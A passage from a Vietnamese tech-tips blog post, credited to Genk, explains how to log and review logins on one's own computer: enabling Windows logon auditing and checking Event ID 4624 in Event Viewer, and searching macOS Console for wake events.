Trong khung bên phải, kích đúp vào thiết lập Audit logon events, để tùy chỉnh một số thiết lập. Sau khi cửa sổ Audit logon events Properties hiện ra, đánh dấu vào hai lựa chọn Success và Failure, sau đó chọn OK. Lúc này máy tính sẽ kiểm soát và lưu lại tất cả những lần đăng nhập thành công cũng như thất bại (điền sai mật khẩu đăng nhập) vào máy của bạn.

[Hình: Su-dung-4.jpg]

Sau khi đã kích hoạt xong tính năng theo dõi, để có thể xem danh sách thống kê, bạn vào Start gõ vào "Event Viewer" rồi ấn Enter. Cửa sổ Event Viewer sẽ xuất hiện, chọn Windows Logs > Security trong cột bên trái. Hộp thoại Security hiện ra với danh sách các hoạt động trên máy của bạn, bạn sẽ phải để ý đến các hoạt động có Event ID 4624, tương ứng với hoạt động đăng nhập thành công vào máy của bạn.

[Hình: Su-dung-5.jpg]

Bạn có thể kích đúp vào hoạt động đó, để xem thông tin tài khoản đăng nhập, thời gian và một số thông tin khác. Bạn cũng có thể tạo bộ lọc để chỉ hiển thị những hoạt động đăng nhập có Event ID 4624, bằng cách tùy chỉnh trong mục Filter Current Log trên thanh công cụ.

Mac

Trên các máy sử dụng Mac OS, bạn chỉ có thể kiểm tra xem có ai sử dụng máy tính của mình khi bạn rời đi và đang để máy ở chế độ Sleep, nghĩa là nó chỉ lưu lại các hoạt động đánh thức máy tính từ chế độ Sleep. Bạn có thể thực hiện theo các bước sau:

Mở hộp thoại Console bằng cách nhấn Command + Spacebar, hoặc click vào biểu tượng Spotlight và tìm kiếm nó. Gõ từ "wake" vào thanh tìm kiếm, sau đó kéo xuống phần dưới cùng của danh sách, bạn sẽ tìm thấy những hoạt động đăng nhập gần đây nhất.

[Hình: Su-dung-6.jpg]

Một vài thủ thuật đơn giản, nhưng hiểu quả giúp bạn kiểm tra những người sử dụng máy tính của mình khi bạn không ở đó. Việc này khá hữu ích để kiểm soát việc sử dụng máy tính của con cái bạn hoặc các em nhỏ, tuy nhiên trong các trường hợp khác bạn nên đặt một mật khẩu cho máy tính của mình để đảm bảo sự an toàn.

Theo Genk
 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương